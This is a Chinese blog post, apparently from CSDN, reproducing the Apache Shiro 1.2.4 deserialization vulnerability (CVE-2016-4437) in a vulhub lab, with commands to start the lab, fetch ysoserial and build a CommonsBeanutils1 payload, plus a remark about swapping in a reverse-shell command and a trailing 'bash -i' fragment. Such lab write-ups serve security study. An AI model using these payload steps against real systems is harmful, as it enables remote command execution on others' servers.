Apache Shiro 1.2.4反序列化漏洞复现

本文详细介绍了Apache Shiro 1.2.4版本的反序列化漏洞复现过程。首先,通过搭建vulhub靶场和安装ysoserial工具来准备环境。接着,利用默认账号密码登录并生成CommonsBeanutils1的Gadget。然后,使用Shiro的默认密钥加密Payload,并在Burp Suite中抓包替换cookie。成功放包后,验证了漏洞利用效果,发现攻击者可以利用此漏洞执行任意命令。最后,建议升级到Shiro的最新版本以避免安全风险。
摘要由CSDN通过智能技术生成

Apache Shiro 1.2.4反序列化漏洞复现

1. 环境搭建
安装漏洞靶场vulhub

git clone git://github.com/vulhub/vulhub.git

下载安装ysoserial

项目源地址:https://github.com/frohoff/ysoserial
jar包下载地址:https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar

2. 漏洞复现
1、 进入到我们下载好的vulhub shiro反序列化漏洞靶场:

cd vulhub/shiro/CVE-2016-4437/
docker-compose up -d

2、打开我们本地的浏览器访问虚拟机的IP地址加8080端口:
在这里插入图片描述
默认的登陆账号密码:admin\vulhub
3、使用ysoserial生成CommonsBeanutils1的Gadget:

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /opt/wula" > poc.ser
# 要反弹sheel的就将命令换成反弹shell命令,ysoserial命令也需要更换,这里就不做详解了。
bash -i 
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值